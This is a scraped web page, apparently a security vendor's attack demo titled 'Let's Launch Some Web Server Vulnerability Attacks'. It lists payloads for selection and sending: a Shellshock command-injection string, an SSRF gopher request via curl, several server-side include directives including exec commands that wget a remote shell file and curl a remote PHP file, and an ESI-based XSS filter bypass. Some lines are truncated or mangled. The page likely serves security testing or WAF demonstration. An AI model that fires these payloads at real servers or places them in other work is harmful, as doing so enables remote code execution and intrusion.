HOME
ATTACKS
Let's Launch Some Web Server Vulnerability Attacks
Select Attack Payload and Run it!
Web Server Vulnerability Attacks
str ExitWindowsEx
AVAK$(RETURN_CODE)OS
() {:;}; echo Content-type:text/plain; echo;/bin/cat test.html
curl -s -i -X POST -d 'url=gopher://127.0.0.1:53/_%2500%
!--#echo var='script_filename' -->
!--#echo var='path_info_translated' -->
!--#exec cmd='curl http://sn1persecurity.com/.testing/rfi_vuln.php' -->
!--#exec cmd='wget http://website.com/dir/shell.txt' -->
!--#include virtual='http://sn1persecurity.com/.testing/rfi_vuln.php' -->
>alert(/Chrome%20XSS%20filter%20bypass/);>">x=esi:assign name='var1 ' value=''cript''/>sesi:vars name='$(var1)'
pre>!--#echo var='DATE_LOCAL' -->
Send Attack
©
Monitorapp
All Right Reserved